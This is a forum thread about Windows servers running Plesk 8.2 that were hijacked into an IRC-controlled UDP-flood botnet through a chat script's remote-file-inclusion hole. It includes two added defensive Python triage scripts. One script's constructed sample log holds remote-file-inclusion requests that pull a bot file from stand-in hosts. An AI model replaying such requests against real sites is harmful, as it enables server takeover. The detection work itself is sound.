  1. #1

    Plesk 8.2 appears vulnerable

    This is a post in the SWSoft forum (http://forum.swsoft.com/showthread.p...766#post194766)

    I have experienced the same problem; my problem began 40 days ago.
    I restarted the server and it didn't come back, so OS reload, restoring Plesk backups. One week later I restarted the server and then the server didn't come back again, so OS reload,
    again and again. I bought a firewall for the server (Cisco Checkpoint X16); this time F-Secure was uninstalled every day. The Planet installed it and it was uninstalled; after all the problems they said 3 days ago that there is a problem with Plesk and I should wait for a solution from SWSoft.
    I mention that I had F-Secure from the time I got the server and I had no problem for 4 months.

    I also ask anyone who has experienced something like this to tell us.

  2. #2
    I believe you must send a direct mail to SWSoft support. They would be more than willing to help you, as it's a company that is proud of their product.

    Don't forget to post your findings here.

  3. #3

    I have asked The Planet

    Hi,
    I have asked The Planet and they said this is a vulnerability in Plesk and SWSoft is working on it; if you check, there is a post in the SWSoft forum but no one answered.
    My question now is: is this The Planet's problem or SWSoft's? I want to know if anyone has experienced it.
    Another thing is that I checked the server last night and it seems that someone was on Remote Desktop; I checked and cureit.exe was installed on the desktop and was running. I asked The Planet support chat and they said no one is working on my server.... but I checked cureit.exe, which is a product from Dr.Web antivirus... do hackers check my system for viruses?

  4. #4
    I've seen a UDP flood running from one of our Windows web servers.

    It keeps triggering my pager when bandwidth peaks. It was at first consuming up to 100Mbit of bandwidth but I lowered the port to 10Mbit to mitigate damages and keep killing it when it restarts. I've now got it under wraps for this particular botnet by blocking all their IPs.

    I found that using tcpview.exe to kill the w3wp.exe process that was connected to IRC servers on 6667 made it stop for a bit until they restarted it. I was able to monitor and get onto the IRC server using wireshark and find out some additional details. The botnet was run by two users who are using it to UDP flood some nameservers and had 500+ bots on the server.

    I think this may be in Plesk as stated and have applied the latest Plesk 8.2.0.1 updates.

    I can't find any good rootkit revealer type tools for 64-bit Windows, but I'm pretty sure Win64 isn't supposed to have as many problems with rootkits because of driver signing and the fact that most are written for 32-bit.

    If it is a new Plesk issue I hope a patch is released shortly!

  5. #5
    Quote Originally Posted by hamed23100:
    Hi,
    My question now is: is this The Planet's problem or SWSoft's? I want to know if anyone has experienced it.
    Another thing is that I checked the server last night and it seems that someone was on Remote Desktop; I checked and cureit.exe was installed on the desktop,

    It's an SWSoft problem, and SWSoft usually uses CureIt to troubleshoot issues related to spyware, so it could be them who logged in to your server.

  6. #6
    Hi,

    I see the same problem on servers which are located in different datacenters. Plesk is vulnerable, not The Planet.

    Hackers use your server for sharing DivX videos or attacking other servers.

  7. #7
    Quote Originally Posted by activelobby4u:
    It's an SWSoft problem, and SWSoft usually uses CureIt to troubleshoot issues related to spyware, so it could be them who logged in to your server.
    SWSoft and I use CureIt to troubleshoot this issue. Hackers don't install CureIt.

  8. #8

    Are you sure?

    Hi,

    I am still in doubt...

    The user was logged in as administrator with client name VZWIN2 (the user name was administrator; the client name is not the user name, it is the computer name of the person who logged in).

    I have sent several PMs via Task Manager but no answer. Also The Planet support told me that when he logged in to his session nothing was running, and when he closed the session everything that had been running, and that I saw in Task Manager, closed.

    Now the new question is: is client name VZWIN2 the computer name of one of SWSoft's support staff?
    Why didn't he answer??

    Or if he is a hacker and has Remote Desktop, why didn't he delete data or change it? I am really worried and becoming crazy.

    Regards,
    Hamed

  9. #9
    I keep seeing outbound connections to remote servers on port 6667 from w3wp.exe. I can kill this in TCPView and it doesn't affect other services.

    Anyone know a good software firewall that works on Win2003 64-bit? I need to block outgoing connections to most ports - unfortunately Plesk moved to Windows Firewall from RRAS, which doesn't do this.

    For now I've added bogus routes for the IPs they've connected to and this has stopped all the outbound connections for a good 24 hours.

    I guess it's time to get a Juniper device going unless there's an IPCHAINS / APF equivalent for Win that's reliable?

    I welcome any input on this as it's been very frustrating.
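
    Posts #4 and #9 both spot the infection the same way: an IIS worker process (w3wp.exe) holding TCP connections to port 6667. The script below, an added example that is not from the thread or from any of the products it mentions, automates that triage over a constructed `netstat -ano` listing and a constructed PID-to-image map of the kind `tasklist` gives; all addresses, PIDs and the 6697 port are assumptions.

```python
import re
from typing import Dict, List

# Constructed `netstat -ano` output in the Windows Server 2003 format (not captured
# from any host in the thread); PIDs and the 203.0.113.x/198.51.100.x addresses are made up.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1596
  TCP    10.0.0.5:1432          203.0.113.10:6667      ESTABLISHED     2044
  TCP    10.0.0.5:1440          198.51.100.7:443       ESTABLISHED     2044
  TCP    10.0.0.5:3389          192.0.2.25:51022       ESTABLISHED     880
  TCP    10.0.0.5:1451          203.0.113.11:6697      SYN_SENT        2051
  UDP    0.0.0.0:123            *:*                                    1020
"""

# Constructed PID -> image name map, the join you would get from `tasklist`.
PID_TO_IMAGE = {1596: "inetinfo.exe", 2044: "w3wp.exe", 2051: "w3wp.exe",
                880: "svchost.exe", 1020: "svchost.exe"}

IRC_PORTS = {6667, 6697}   # the port the thread reports plus the usual TLS IRC port (assumed)

# Only TCP rows carry a State column; UDP rows are deliberately not matched.
TCP_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")


def flag_irc_connections(netstat_text: str, pid_to_image: Dict[int, str],
                         image: str = "w3wp.exe", ports=IRC_PORTS) -> List[dict]:
    """Return TCP connections owned by `image` (an IIS worker process by default)
    whose remote port is an IRC port. A web worker has no reason to speak IRC,
    so each hit is a C2 indicator: record the PID, find the application pool it
    serves, and read that site's logs for the entry point instead of just killing it."""
    hits = []
    for line in netstat_text.splitlines():
        m = TCP_LINE.match(line)
        if not m:
            continue
        laddr, lport, raddr, rport, state, pid = m.groups()
        owner = pid_to_image.get(int(pid), "").lower()
        if owner == image.lower() and int(rport) in ports:
            hits.append({"pid": int(pid), "image": owner, "state": state,
                         "local": f"{laddr}:{lport}", "remote": f"{raddr}:{rport}"})
    return hits


if __name__ == "__main__":
    for hit in flag_irc_connections(NETSTAT_SAMPLE, PID_TO_IMAGE):
        print(f"{hit['image']} pid={hit['pid']} -> {hit['remote']} ({hit['state']})")
```

    A half-open SYN_SENT row is worth keeping in the output: it shows the bot still retrying its C2 after the route has been black-holed, which is the behaviour post #9 describes.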

  10. #10
    Quote Originally Posted by nzych:
    I guess it's time to get a Juniper device going unless there's an IPCHAINS / APF equivalent for Win that's reliable?
    You can use IPsec.

  11. #11

    Let me explain my problem fully

    Hi,

    Let me explain my problem fully and you tell me if it could be a hack.
    I had no problem until I did the first OS reload. After that the server was OK for one week, until The Planet updated my F-Secure and after a restart the server went down, and they said another OS reload. Again they did an update on my F-Secure and another restart; nothing happened, but exactly a week later, on the second restart, the server didn't respond. This time the outage ticket went on for so long, and they brought my server back but with no RDP; they just installed VNC and told me to use that.
    They told me some changes in the Registry had closed RDP, but I asked a security person and he told me that changes to the Registry need someone to log in with the Administrator role.... but if he logged in as administrator, why did he close RDP? Why didn't he delete data or change data?

    And after that I did another OS reload and then ordered a Cisco firewall and F-Secure was installed again, but some days later I saw an email on my server... IP alert, server was restarted. I logged into the server and saw... wow... F-Secure was uninstalled? I created a ticket and TP installed it again; another restart, the server came back; again the day after that I came back: no F-Secure but no restart... They said this is an SWSoft problem? Could it be?

    Could it really be a hack?

    Regards,
    Hamed

  12. #12
    Hi,

    Let me butt in if I may. From the conversation you seem to be having, you are using a WINDOWS version of PLESK 8.2. If you read very carefully through the product manuals given out by SWSoft, they prefer LINUX as their operating system of choice because of its stability and, well, ability to resist hackers.

    PLESK 8.2 on LINUX is safer than PLESK (anything) on WINDOWS 2003 (32/64). I know this for a fact because I used to host WINDOWS 2003 Dual AMD 64's and had nothing but problems. I am now lucky if I get an email a month from my members because I converted to just LINUX RED HAT AS 4.6 with PLESK 8.2.

    If you are having problems it is more than likely because you are on a WINDOWS based system.

    - 64bithost
    Professional Plesk Webhosting.
    No overselling.
    Always available for you.
    http://www.64bithost.com - 1-352-3164619

  13. #13

    This was not my answer

    Hi,

    This was not my answer... I want to know: could this situation be a hack? Could it be from Plesk?
    Is someone from The Planet doing that?....

    Regards,
    Hamed

  14. #14
    I cannot answer as to the actual fact of whether it is a "hack". To better answer your question, email dennis at swsoft.com; his email address is info@swsoft.com. Sometimes SWSoft will log in to your Windows server and put software on it to monitor new changes. You will see, if you have 'root' access, that someone has logged in to the VZ, and that is all I'm going to expose in a public forum about PLESK. Dennis is their security officer/main programmer and can explain it to you in a confidential email.

  15. #15

    Please help me

    I have sent mail, but going by my last emails I know they won't answer.
    I hope I can get an answer from the specialists and server owners who are in this forum.
    Please give me the way to make sure whether it is a hack or from SWSoft.

    Regards

  16. #16

    They don't answer, they asked for money

    Hi,

    I got an email from them and they said create a ticket and pay money to get an answer.
    It seems nobody is ready to say whether this problem is from Plesk or...?
    Any opinion?

    Regards,
    Hamed

  17. #17
    It's not that they are being lazy, or trying to say it is not their problem. You are looking for an answer that no one has yet. If SWSoft, The Planet, ANYONE... had the answer, a patch would be released (official or not).

    Do some recon, set up a honey pot, block some IPs, see what you can find yourself; it will only help bring everyone closer to a solution.

    The Planet uses Linux workstations. I'm not sure what rdesktop identifies as (maybe VZWIN2). It is also very possible it is SWSoft, as VZ is something they use a lot (VZMC, Virtuozzo, VZPP, VZCP, vzctl, etc...).

    While it is not very nice that they did not respond to you, this does not mean it was not a tech. When you are trying to do your job and investigate something, and a customer wants to chat with you about the problem... it can be quite distracting, so messages like those are often ignored.

  18. #18

    w3wp UDP Flood

    I have had one of our Windows Server 2003 systems spiking our bandwidth at near 100% the past few weeks. I have had to manually kill the w3wp processes running on UDP (using tcpview).

    I host many websites on this system. We separated them all into individual application pools, and we narrowed it down to one website. Looking through the logs revealed an exploit in a flash chat script we were using. We renamed the chat folder to something not linked or guessable and it went away.

    You will not find an infected file on your system. The attack is including a remote file via http that opens up an IRC channel on port 6667 then listens for commands to start a ddos attack with UDP packets, etc.

    Google aedating4CMS and you will find out much about the hack.

    Hope this helps anyone. I spent much time tracking this down and wanted to share to help!
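
    Post #18 found the entry point in the IIS logs: a script being handed a remote URL to include. The scanner below is an added example, not the poster's code and not tied to any real chat script; it reads the W3C `#Fields:` header so column order does not matter, and flags every query parameter whose value is an absolute URL. The log excerpt, the `/chat/index.php` path, the `inc` parameter and the hosts in it are all constructed.

```python
import re
from typing import List
from urllib.parse import parse_qsl

# Constructed IIS 6.0 W3C log excerpt (not from the poster's server); script path,
# parameter name and hosts are made up to show the pattern, not the real vulnerable script.
IIS_LOG_SAMPLE = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2007-10-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2007-10-01 00:01:02 10.0.0.5 GET /chat/index.php room=lobby 192.0.2.40 Mozilla/4.0 200
2007-10-01 00:01:09 10.0.0.5 GET /chat/index.php inc=http://203.0.113.50/bot.txt? 198.51.100.9 libwww-perl/5.805 200
2007-10-01 00:02:30 10.0.0.5 GET /chat/index.php inc=https://203.0.113.51/x.txt%3F 198.51.100.9 libwww-perl/5.805 200
2007-10-01 00:03:11 10.0.0.5 GET /blog/post.php url=http://example.net/page 192.0.2.41 Mozilla/4.0 404
"""

# A parameter value that is itself a URL is the remote-file-inclusion signature.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def find_remote_include_attempts(log_text: str) -> List[dict]:
    """Scan an IIS W3C log for query parameters whose value is an absolute URL.
    Field order comes from the #Fields: header, so any selection that includes
    cs-uri-stem, cs-uri-query and c-ip works. Triage the hits by status and script:
    a 200 on a script that includes files is the one to chase, a 404 is only noise."""
    fields = None
    hits = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        cols = line.split(" ")
        if len(cols) != len(fields):
            continue            # skip malformed rows rather than mis-assign columns
        rec = dict(zip(fields, cols))
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue            # IIS writes "-" when there is no query string
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append({"client": rec["c-ip"], "path": rec["cs-uri-stem"],
                             "param": name, "url": value, "status": rec.get("sc-status")})
    return hits
```

    Run over the real logs for the pool that owns the offending w3wp.exe, the first hit with a 200 points at the script to rename or remove, exactly the step post #18 took.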
